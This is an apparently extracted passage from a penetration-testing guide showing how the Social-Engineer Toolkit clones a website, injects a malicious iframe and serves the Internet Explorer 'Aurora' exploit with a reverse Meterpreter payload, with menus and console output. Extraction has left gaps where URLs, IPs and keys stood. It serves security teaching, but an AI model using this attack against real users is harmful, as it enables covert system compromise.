background image

The Social-Engineer Toolkit


SET supports both HTTP and HTTPS

 Enter the url to clone:


Website Attack Vectors

   from the SET main menu, and then 


The Metasploit Browser Exploit Method

  . Then select the 

Site Cloner


option, and enter

   as the website you want to use 

for cloning.

Once the site is cloned, we’ll set up the exploit to trigger when a target 

browses the site.

Enter the browser exploit you would like to use

 16. Microsoft Internet Explorer "Aurora"

Enter your choice (1-23) (enter for default): 


What payload do you want to generate:

Name:                                      Description:

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

 Enter choice (example 1-10) (Enter for default):


Enter the port to use for the reverse (enter for default):

[*] Cloning the website:
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...                                                                               

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on
[*] Using URL:
[*]  Local IP: http://
[*] Server started.

To complete the attack setup, select the client-side exploit you wish to 

use. Above, we choose the infamous Internet Explorer Aurora exploit   and 
accept the default reverse Meterpreter payload by pressing 



When the target reaches

, the site looks normal, 

but his system is compromised through an 

iframe injection

. SET automatically 

rewrites the site to contain the iframe that houses the Metasploit client-side 

Back at the attacking machine, we see that the attack is successful. The 

Meterpreter session has established the connection from the target to the 
attacking machine, and we have full access to the system, as shown here.